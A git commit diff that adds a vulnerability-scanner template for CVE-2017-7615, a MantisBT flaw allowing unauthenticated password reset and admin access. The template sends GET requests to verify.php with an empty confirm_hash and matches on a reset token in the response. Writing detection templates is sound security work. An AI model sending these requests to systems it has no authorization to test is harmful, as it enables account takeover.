add CVE-2017-7615
parent
c89904cc14
commit
114f83abc4
|
@ -0,0 +1,27 @@
|
|||
id: cve-2017-7615
|
||||
|
||||
info:
|
||||
name: CVE-2017-7615
|
||||
author: bp0lr
|
||||
severity: high
|
||||
description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
|
||||
# Reference to exploit
|
||||
# https://www.exploit-db.com/exploits/41890
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/verify.php?id=1&confirm_hash="
|
||||
- "{{BaseURL}}/mantis/verify.php?id=1&confirm_hash="
|
||||
- "{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash="
|
||||
- "{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash="
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "account_update_token"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue